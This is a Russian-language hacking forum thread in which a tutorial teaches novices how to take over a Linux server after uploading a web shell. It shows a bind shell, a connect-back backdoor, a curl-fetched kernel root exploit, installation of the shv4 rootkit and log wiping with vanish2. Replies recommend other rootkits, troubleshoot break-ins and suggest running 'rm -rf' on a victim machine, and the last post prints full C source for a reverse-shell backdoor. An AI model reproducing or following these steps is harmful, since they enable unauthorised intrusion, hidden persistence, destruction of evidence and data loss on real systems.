Просмотр полной версии : R00t me №1
Решил написать статейку для расширения кругозора новичков античата в целом.
Думаю, она многим понадобится и даст маленький толчок в дальнейшем развитии.
Статья предназначена для тех, кто уже умеет заливать веб-шелл и ознакомлен со всеми его прелестями...
Итак – мы залили шелл. Что же делать дальше?
Отдаём первую команду:
uname –a
Что же мы видим?
Linux nalog.com 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
Ядро старо,как мир.Нашей задачей будет поднять свои привилегии до максимальных aka root.Описание взлома всех версий линуксов,фрях,ect описать не реально-так что в этой статье будем говорить исключительно о Linux 2.4.20-8.
Погнали)
Для начала проделаем следующие шаги:
1) cd /tmp
mkdir logs
cd logs
2)Cливаем: bind.pl
chmod +x bind.pl
perl bind.pl
Запускаем: netcat – nc sitename 32767
Где sitename -ваш сайт.
При открытии окна командуем: id.Работает?
Отлично)
Но межет и не работать если фаер фильтрует соединение(
Тогда скачиваем Connect-Back Backdoor (bd.c)
chmod +x bd.c
gcc db.c –o bd
После чего ставим netcat на прослушку 4000-ого порта: -l –p 4000
И запускаем бекдор:
./db 127.0.0.1 –
Где 127.0.0.1 ваш реальный ip.
И вот в окошке появилась надпись - Connected to CommandLine...
Приступим к решительным действиям:
Скачиваем сплойт для этой версии ядра-вполне должен подойти mremap_pte,но я советую воспользоваться xpl_brk ,т.к он меня редко подводил.
Скачиваем уже cкомпилированный сплойт:
curl http://xpl.netmisphere2.com/xpl_brk
chmod +x xpl_brk
./ xpl_brk
id
uid=0(root) gid=0(root)
Отлично.Мы добись того чего хотели,но это только пол дела.
http://img286.imageshack.us/img286/4451/screenshot310520062020245gg.png
Надо закрепиться в системе для этого скачиваем руткит-возьмём shv4
curl http://splo1t.narod.ru/rootkits/shv4.tar.gz
tar xzf shv4.tar.gz
cd shv4
chmod +x setup
./setup pass 4321
*где pass(пароль) и 4321(порт) ваши значения. Во избежание проблем не советую вешать на высокий порт.
Заходит в putty указываем сайт, порт и конектимся.
Имя root,а пароль тот что вы указали при настройке. В моём случае это pass.
Зашли?
Выполняем команду:
nestat -an
Как видите заданный порт не где не светится,а значит мы освободили себя от зоркого глаза админа:)
Осталось, почистить логи.
Скачиваем один из лучших клинеров под *nix -vanish2
chmod +x vanish2.
Собираем gcc vanish2.c –o vanish
Запускаем:./vanish root name_site 127.0.0.1
*Где 127.0.0.1 ваш реальный ip.
Видим надпись:
V_A_N_I_S_H_E_D_! Которая не может не радовать глаз.
_ _ _ _ _ _ _ _ _ _ _ _ _ _
На этом моя статейка кончается-надеюсь она поможет новичкам...
Ссылки:
r57Shell: http://hcr.3dn.ru/expl/php/r57shell.txt
Netcat:http://pro-hack.ru/download/s_nettools_2.html
bind.pl: http://nsd.ru/soft/1/ano/bind.pl.txt
Connect-Back Backdoor: http://desrow.narod.ru/www/bd.rar
xpl_brk: http://desrow.narod.ru/exploits/xpl_brk.rar
shv4: http://desrow.narod.ru/rootkits/shv4_.rar
Putty: http://pro-hack.ru/download/s_nettools_4.html
vanish2: http://nsd.ru/soft/1/anonimus/vanish2.tgz
For any link pass:antichat
=====[ Desr0w | | 12.04.2006 ]=====
ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд...
+ всё же поставлю...
limpompo
12.04.2006, 20:00
Как раз для новичков =) Нормуль!
Хорошая статья.... кста, в Nfm уже сразу сплойты есть.... скачиваются сразу скомпиленными.....
evil_packman
12.04.2006, 20:51
хмм статья конечно для новечков ничего, тока вот shv4 или 5 ставить не советую, так как он палит порт и легго пропаливается нмапом при сканировании.
советую лучше suckit http://packetstormsecurity.org/UNIX/penetration/rootkits/sk-1.3a.tar.gz
тока собирается он не всегда.
или adore если есть шелл доступ http://www.eviltime.com/download_id.php?id=147
или смотрим руткиты на этой паге http://www.eviltime.com/download.php?page=hacking&subpage=rootkits
А почему бы не сразу СЮДА (http://www.rootkit.com/)?))
ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд...
+ всё же поставлю...
Ну я ж сказал для тех кто умеет юзать хотя бы веб-шелл.По идеи они должны знать эти команды.
Ну мне не сложно:
pwd
Эта команда выводит на экран полный путь к текущему каталогу.
В любой момент можно узнать где вы находитесь.
ls
Команда ls выводит список файлов и подкаталога.
По умолчанию файлы начинающиеся с точки (.) скрываются.
Чтобы их увидеть надо добавить ключ -a:
ls -a
Для полной инфы от папках и файлах и ссылках:
ls -al
Хотим просмотреть файлы в других дирах:
ls -al /tmp
cd
команда позволяет сменить текщий каталог:
cd /tmp/bbb и вы уже в папке bbb
например в каталоге bbb есть подкаталог bb-перейдём в него.
cd bb
Если нужно переместится на каталог выше:
cd ..
mkdir
Создание директории.
Например:
mkdir antichat
rm
Удаление файлов.
Для удаления директорий нужны след. ключи:
-d -- удалить директорию.
-r -- удалять содержимое директорий.
-f --не спрашивать подтверждение на удаление.
rm -rf /tmp/bbb/antichat - так мы удалим дирикторию antichat.
tar
В никсах нет винрара:)
Архивы поставляются в виде tar.gz
Разархивируем:tar xzvf namefile.tar.gz
which
Команда предназначена для того,чтобы узнать каталог в котором находится программа.
Мы например узнаём какая качалка стоит на серве.
Пример:
which ls
/usr/bin/ls
Ну вот вроде все команды использованные в статье.
А..И еще немного о качалках:
Самая распространенная -wget
есть еще:
curl
fetch
lynx
links
GET
зы:
uname -a
показывает версию системы и еще кое что.
id -показывает ваши права.
hostname
показывает имя сайта.
есть ключ -i
hostname -i покажет ip данного сайта.
The end.
Описание руткитов:тут (http://desr0w.narod.ru/rootkits.txt)
Kez,приятно слышать это от тебя!
Чесно так думаешь?
да я действительно так думаю....
Сори за оффпот.
Kez,отписал-что не отвечаешь.
Ты бы асю еще свою дал;)
Вот теперь всё на своих местах :) надеюсь не будет никаких глупых вопросов от нубов типа: "что такое ls, как разархивировать архив, как посмотреть открытые порты..."
Из этой статьи больше понравилась часть про руткиты, хороший обзор, много интересного, побольше бы таких статей про sql, тогда бы было ВСЁ супер!
Скоро думаю написать про установку всего нужного софта и т.д.
Мелочь конечно,но думаю после прочтения этой статьи и просмотра видео кому то понадобится...
Естественно всё будет написано в жанре для новичков:)
shv4: http://splo1t.narod.ru/rootkits/shv4.tar.gz
мелочь конечно, но в первом посте 2 раза упомянуто... ;)
Я очень много нового узнал ;) Молодец Дес ! Так держать, жду следущих материалов ...
Desr0w
зачем делать так:
cd /tmp
mkdir logs
cd logs
если все можна в 1ну строку через ;
далее
chmod +x bind.pl
perl bind.pl
&
chmod +x bd.c
gcc db.c –o bd
зачем??? ты знаешь значение +x ???
почитай маны по tar & hostname а курсы у тебя наверное не очень =)
ps: статья отстой! даже для новичков! не в обиду брат!
Буду признателен,если мемберы/модеры поставят этому доброму человеку пару десятков минусов.Думаю есть за что.При -10 автобан работает?
Не понимаю я таких людей:
Вот я писал-старался...Всё оценили данную статью,как хороший мануал для новичков.
Но вот появляется борзый новичёк и обсирает мою статью и меня.Зачем это человеку надо?
Ну может он второй Кевин Митник или кто другой,если считает что эта статья плоха даже для новичков...
своими словами обламываешь так?
А может он просто набиваешь посты т.к кроме критики и мата нечего больше ответить. :)
гг
угу спасиба как роаз вчера все мозги себе проебал с этой байдой.
точнее с этим проблем не было написанно версия такая то а сплойт не хочит запускаться пишет
[-] Unable to attach: Operation not permitted
/bin/sh: line 9: 8931 Killed ./ads
где ads сплойт.
грят версия не падходит.
У меня такая проблемка была часто. Запускаю bind.pl всё вроде ок. Пjтом не могу приконектиться на указанный порт. А про статью нормал. Про +x помойму это добавляються права файла на запуск.
У меня такая проблемка была часто. Запускаю bind.pl вссё вроде ок. ПОтом не могу приконектиться на указанный порт. КЕЗ тебе аську не даст точно говорю. Он в ней не сидит. А про статью нормал. gr3yh47 А ты мудак полный обсираешь тех кто выше тебя.
Тебе место бан. Про +x помойму это добавляються права файла на запуск.
C bind.pl праблы имхо из-за того что фаер фильтрует входящие соединения.
С KEZ'ом разобрались-отличный парень:)
Про +x помойму это добавляються права файла на запуск.
Ага,только не пойму почему этот дятел меня об этом спросил:)
Morph,рад что помог.
А насчёт
[-] Unable to attach: Operation not permitted
/bin/sh: line 9: 8931 Killed ./ads
Думаю что мож какая система защиты убивает,хотя может и версия...
Спасиба рута взял первого в своей жизни повесил в оправдание в своей подписи :)
Кароче спасиба делал не как ты но сплойт помог спасиба!
Другие какие не пробовал все такой ошибкой и тухли =\
АГРОМНОЕ СПАСИБА!
Desr0w
зачем делать так:
cd /tmp
mkdir logs
cd logs
если все можна в 1ну строку через ;
далее
chmod +x bind.pl
perl bind.pl
&
chmod +x bd.c
gcc db.c –o bd
зачем??? ты знаешь значение +x ???
почитай маны по tar & hostname а курсы у тебя наверное не очень =)
ps: статья отстой! даже для новичков! не в обиду брат!
Уважаемый к чему такая грубая не заслуженная критика?
Я знаю что команды можно писть через ; ,но я уверен
что для новичков будет более понятнее если команды будут написаны по очерёдно.
Что зачем??Я знаб значение chmod +x - права на исполнение.Как ты запустишь бедор если нет прав на запуск,а?
Маны по по tar & hostname ,а зачем?
Я что написал не привильно по этим командам?
Обьясни плз.
*для тебя-описание команды hostname занимает две строчки.У тебя что маны по две страницы для ...
Какие курсы?
P.s-статья хорошая,как мануал для новичков и всё тебе это скажут.
И чисто по человечески-ты мне не брат,**** super man.
GreenBear
14.04.2006, 00:37
Молоток прям
тама оказываеться все путем было, спйлоты убивались а версия правильная была все мозги с некотороми проипал кто еще "дурак" оказываеться.....
Я знаб значение chmod +x - права на исполнение.Как ты запустишь бедор если нет прав на запуск,а?
в данном случае chmod +x не обязателен, ты указываешь компилятору имя файла, а там без разницы какие права, главное чтоб на чтение были, а после компиляции он сам права на исполнение поставит, с перлом тоже не нужно, если запускаешь тип perl script.pl
Ну и ещё не понравилась манера делать back connect'ы на свой реальный ip. Для этого лучше использовать шеллы, а так статья ничего
в данном случае chmod +x не обязателен, ты указываешь компилятору имя файла, а там без разницы какие права, главное чтоб на чтение были, а после компиляции он сам права на исполнение поставит, с перлом тоже не нужно, если запускаешь тип perl script.pl
Ну и ещё не понравилась манера делать back connect'ы на свой реальный ip. Для этого лучше использовать шеллы, а так статья ничего
Хм...ПРоверил на шелле-ты прав.
Например в видео с некого журнула чьёму сайту "Сломали нос" всегда после скачки сплойта дают права на исполнение после того как компилить...
Спасибо буду знать,хоть это и мелочь.
Хорошая статья, мне понравилась
Эх Kez,Kez...
Вот хотел я писать статью R00t me №2 типа установка всего необходимого софта и работа с ним...
Сделав на 60-65% заметил твой обзор:
http://forum.antichat.ru/thread8274.html
Всё не будет стаьи кез всё разобрал(
Жаль что раньше не увидел-только время на неё убил.
Вот.
народ хелп )))
я кароч поставил руткит этот воть а у меня на нем пароль какая то сцука сменила админ поидее бы нверное бы его бы убил а не пароль менял.
чо то у меня такое ощущение что тама кто то кроме меня еще есть.
вот такой мой первый опыт )))
Morph,ты shv4 ставил?
Имхо на shv4 сметить пасс нельзя...
Есть два варианта:
1)ты не правильно пасс пишешь или просто приконектился случайно на стандартный порт и пытаешься зайти под настоящим админом.
2)Твой руткит удалил хакер и поставил свой ,что я сомневаюсь- т.к он бы 100 % перевесил на другой порт.
Думаю причина №1 больше вероятна.
Пробни еше раз зацепится на тот порт ,на который вешал и ввести пароль не торопясь(можно раскладку клавы пробить;)
Удачи.
Спасиба но все я правильно делаю все на тот же порт конечусь и пароль не правильный :(
То есть возможно что был поставлен руткит другим челом чтоли?
Именно на этот порт да?
И пароль сменился мой на его?
А если я щас заного поставлю этот руткит и установлю его заного но на другой порт повешу? Этот руткит старый на котором пароль не подходит он не удалиться?
Ну тоесть возможно ли чтобы на 1 тачке весело два одинаковых руткита? но висело на разных портах и на разных паролях?
Тьфу блин )
Ну то есть два руткита но на разных портах и один другого не трогал?
Кстати каким макаром руткит удалить то?
НУ и нафлуди ты:)
Два руткита врятли,т.к он подменяет системные файлы своими.Т.е не может быть 2 пары подменённых системных файлов,да и ядру наверно сразу бошнб снёсёт и оно упадёт.
Удалить скрипт можно только возвратом системных файлов...
Корочь у тебя бредовая совсем ситуация..Посмотрим что скажут другие знающие я уже всё вроде сказал...
то есть ничего не зделать?
хмм блин =\
dinar_007
16.04.2006, 12:53
.:: Не руть, да не поручен будешь! ::.
( c ) STF
=)
Хмм а что если поставить рутки версии shv5 а не 4?
То могут ли они вместе ужиться?
Да и какой руткит мона поставить кроме этих тама же грят в них вся байда на левое мыло отправляеться и порт и пароль.
Выбора у тебя нет.
Пробуй ставить тож же руткит на другой порт-будь что будет.
Попытался 1 раз толи ставить не хочет, толи выполнялось долго.
Ну я вышел не стал рисковать.
Да мне зачем мне именно тот нужен был, а другие зачем мне.
а нах те 2 руткита?разве админ не заметит этого?
m0nzt3r,да он тот каким то образом про...
Читай выше_)
Да Desr0w прав я проебал свой руткит.
Не знаю как но пароль тама сменился, и он светиться в netstat -a мой порт.
limpompo
17.04.2006, 18:36
shv4 или shv5 - галимые.... ТОлько портят систему!
А тогда что поставить то чтоб не паленно было ну покрайней мере не очень и в установке попроще.
Ну не гений я пока еще в этом :(.......
limpompo,а что из паблика посоветуешь?
Adore?
Хотя насчет проще не нада разберусь.
Переименовываем как поставить руткит и чтобы его не съебали для Морфа... :))))))))
Имхо для Pyccxak.com не проблема преобрести/достать приватный руткит подходящий по всем требованиям...
лол)))
Деньги то не у всех у нас тока 1 чел и спасает что за хостинг платит а про руткит эт уж не дано нам малые мы исчо.
хех,слышал саня сплойтами банчит...
Кста кто знает shv5 еще в привате?
Morhp uname -a?какой год кернела?
а нах ваще руткит ставишь?тем более паблик...лучше закинь пару шеллов и бекдор оставь...и все будет в шоколаде..или ваще зайди под рутом и сделай:
wall root cd /;rm -rf * :D :D :D, ну а дальше по инерции cd /;rm -rf * =)))
Такое бурное обсуждение совместимости... Неужели на форуме никто не в курсе, как руткиты друг с другом сочетаються? Или все вУмные молчат в тряпочку? Может, такое в паблике не любят обсуждать... но вот, что я могу ответить.
Desr0w, это описание добавь в своё. Думаю всем пригодиться.
Смотреть и обсуждать ТУТ (http://forum.antichat.ru/showthread.php?p=139797#post139797)
ага потом кто мне тачку эту после всей этой байды откачивать будет Монстр?)))
Добрый ты смотрю :)
Elekt То есть можно поставить два shv4 одновременно???
Elekt То есть можно поставить два shv4 одновременно???
Могу.... Но тока на два разных компа :))))))))
Два руткита в системе - это полная Ж (даже если они двух разных типов). Думаю, это можно сделать, если второй руткит ставить, подправив конфиг(сменить пути и другое).
Практически такое счастье не делал. Хочу протестить на виртуалке.
ЗЫ: Монстр у нас уже есть. А я - такое скрооомное чудовище :)
Млин =\
Лана не ебу как но руткит у меня спизжен либо кем то ,либо админом что мало вероятно, либо хз, тама светиться порт моего руткита в нетстат вот что мне больше всего не нравиться =\
Хмм а если поставить руткит Adora?
То уживуться ли вместе они с shv4?
Зы се равно когда нить пришлось бы этим заняться, сорри что туплю но бывает епт.
Morph,скоро всё будет....
ну раз будет то лана а что буит то?
зы у тя сплойты с народа удалили)
Кто-нибудь может выложить mremap рабочий плз?
Тут много инфы (http://rst.void.ru/forum/)
r3f13c70r
05.05.2006, 21:08
Кто-нибудь может выложить mremap рабочий плз?
Глянь в шелле NFM 1.7 там линки есть на отмычки для линуха... Тама мремап, брк, для сендмыл и еще куча всякой лабуды )))
1) Просьба неактуальна ибо давно в тот же день всё нашёл
2) __http://hackru.info/ (а именно с него сплойты грузились) уже месяц как упал и, по-видимому, подниматься не собирается
satana8920
29.06.2007, 12:18
народ залейте куда нито Connect-Back Backdoor а то там ссылка сдохла а он понадобился!!! с меня репа!
зы статья ваще кулл
молодца -- пойдет -- давай еще фряху и тд другие ядра -- потом слепишь в общий мануал =) -- и больше сплоентов - нормульн
ТС редакти кста первый пост а то надоедает лазить по страницам =)
народ надо Connect-Back Backdoor (bd.c)
дайте линк на скачку плизззз
не могу найти
nobi
Может это (http://www.securitylab.ru/forum/read.php?FID=17&TID=5083)
nobi
Может это (http://www.securitylab.ru/forum/read.php?FID=17&TID=5083)
я так понял это для винды и мне надо для
Linux 2.6.16
Держи back-connect
/* Digit-Labs Connect-Back Backdoor
*
* Use this backdoor to access
* machines behind firewalls.
*
* step 1. setup a listening port
* on your box e.g.
* nc -l -p 4000
*
* step 2. Run this file :
* ./cbd <ip_of_listening_machine>
*
* grazer@digit-labs.org
* http://www.digit-labs.org
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = 4000;
struct sockaddr_in addr;
char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n * Connected to CommandLine...\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n\n %s <ip> \n\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
if(connect(fd, (struct sockaddr*)&addr, sizeof(addr))<0)printf("fucker!\n");
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0); // thnx dvorak
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);
close(fd);
return 1;
}
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot